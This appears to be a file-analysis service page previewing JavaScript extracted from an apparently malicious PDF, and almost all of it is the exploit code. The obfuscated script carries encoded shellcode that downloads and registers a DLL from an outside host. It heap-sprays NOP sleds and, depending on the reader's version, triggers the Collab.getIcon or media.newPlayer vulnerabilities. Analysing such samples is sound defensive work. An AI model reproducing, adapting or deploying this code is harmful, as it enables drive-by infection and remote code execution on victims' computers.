Preview script First 1,000 lines of the extracted script var _1o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u312F%u6568%u6469%u2D69%u6C61%u6567%u7262%u2E61%u3433%u2E35%u6C70%u702F%u7974%u7061%u7974%u612F%u3263%u3163%u3263%u3331%u6531%u3061%u6232%u3130%u3366%u3731%u6138%u6639%u3435%u6164%u3139%u2F36%u3764%u702E%u7068%u663F%u673D%u0000';var _2o='%u8366%uFCE4%u85FC%u75E4%uE934%u335F%u64C0%u408B%u8B30%u0C40%u708B%u561C%u768B%u3308%u66DB%u5E8B%u033C%u3374%u812C%u15EE%uFF10%uB8FF%u408B%uC330%u3946%u7506%u87FB%u2434%uE485%u5175%uEBE9%u514C%u8B56%u3C75%u748B%u7835%uF503%u8B56%u2076%uF503%uC933%u4149%uADFC%uC503%uDB33%uBE0F%u3810%u74F2%uC108%u0DCB%uDA03%uEB40%u3BF1%u751F%u5EE6%u5E8B%u0324%u66DD%u0C8B%u8D4B%uEC46%u54FF%u0C24%uD88B%uDD03%u048B%u038B%uABC5%u595E%uEBC3%uAD53%u688B%u8020%u0C7D%u7433%u9603%uF3EB%u688B%u8B08%u6AF7%u5905%u98E8%uFFFF%uE2FF%uE8F9%u0000%u0000%u5058%u406A%uFF68%u0000%u5000%uC083%u5019%u8B55%u8BEC%u105E%uC383%uFF05%u68E3%u6E6F%u0000%u7568%u6C72%u546D%u16FF%uC483%u8B08%uE8E8%uFF61%uFFFF%u02EB%u72EB%uEC81%u0104%u0000%u5C8D%u0C24%u04C7%u7224%u6765%uC773%u2444%u7604%u3372%uC732%u2444%u2008%u732D%u5320%uF868%u0000%uFF00%u0C56%uE88B%uC933%uC751%u1D44%u7700%u6270%uC774%u1D44%u2E05%u6C64%uC66C%u1D44%u0009%u8A59%u04C1%u8830%u1D44%u4104%u6A51%u6A00%u5300%u6A57%uFF00%u1456%uC085%u1675%u006A%uFF53%u0456%u006A%uEB83%u530C%u56FF%u8304%u0CC3%u02EB%u13EB%u8047%u003F%uFA75%u8047%u003F%uC475%u006A%uFE6A%u56FF%uE808%uFE9C%uFFFF%u4E8E%uEC0E%uFE98%u0E8A%u6F89%uBD01%uCA33%u5B8A%uC61B%u7946%u1A36%u702F%u7468%u7074%u2F3A%u312F%u6568%u6469%u2D69%u6C61%u6567%u7262%u2E61%u3433%u2E35%u6C70%u702F%u7974%u7061%u7974%u612F%u3263%u3163%u3263%u3331%u6531%u3061%u6232%u3130%u3366%u3731%u6138%u6639%u3435%u6164%u3139%u2F36%u3864%u702E%u7068%u663F%u6E3D%u0000';function _3o(){var _4o=app.viewerVersion.toString();_4o=_4o.replace('.','');while(_4o.length<4){_4o+='0';}_4o=parseInt(_4o,10);return _4o;}function _5o(){function _6o(){var _7o='p@111111111111111111111111 : yyyy111';util.printd(_7o,new Date());}var _8o=12000;_9o=new Array();var _1o0='%u9090%u9090';var _1o1=_2o;_1o0=unescape(_1o0);_1o1=unescape(_1o1);while(_1o0.length<=0x8000){_1o0+=_1o0;}_1o0=_1o0.substr(0,0x8000-_1o1.length); for(_1o2=0;_1o2<_8o;_1o2++){_9o[_1o2]=_1o0+_1o1;}if(_8o){_6o();_6o();try{this.media.newPlayer(null);}catch(e){}_6o();}}function _1o3(){var _1o4=unescape(_1o);_1o5=unescape('%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090')+_1o4;_1o6=unescape('%u9090%u9090');_1o7=10;_1o8=_1o7+_1o5.length;while(_1o6.length<_1o8)_1o6+=_1o6;_1o9=_1o6.substring(0,_1o8);_2o2=_1o6.substring(0,_1o6.length-_1o8);while(_2o2.length+_1o8<0x40000)_2o2=_2o2+_2o2+_1o9;_2o0=new Array();for(_2o1=0;_2o1<180;_2o1++)_2o0[_2o1]=_2o2+_1o5;var _2o3=4012;var _2o4=Array(_2o3);for(_2o1=0;_2o1<_2o3;_2o1++){_2o4[_2o1]=unescape(' ');}Collab.getIcon(_2o4+'_N.bundle');}var _4o=_3o();if(((_4o>8950)&&(_4o<9050))\|\|((_4o>=8000)&&(_4o<=8102))){_1o3();}else if((_4o>=9100)\|\|(_4o<=9200)\|\|(_4o>=8103)\|\|(_4o<=8107)){_5o();}

Open this report in the interactive analyzer, or submit your own file for analysis.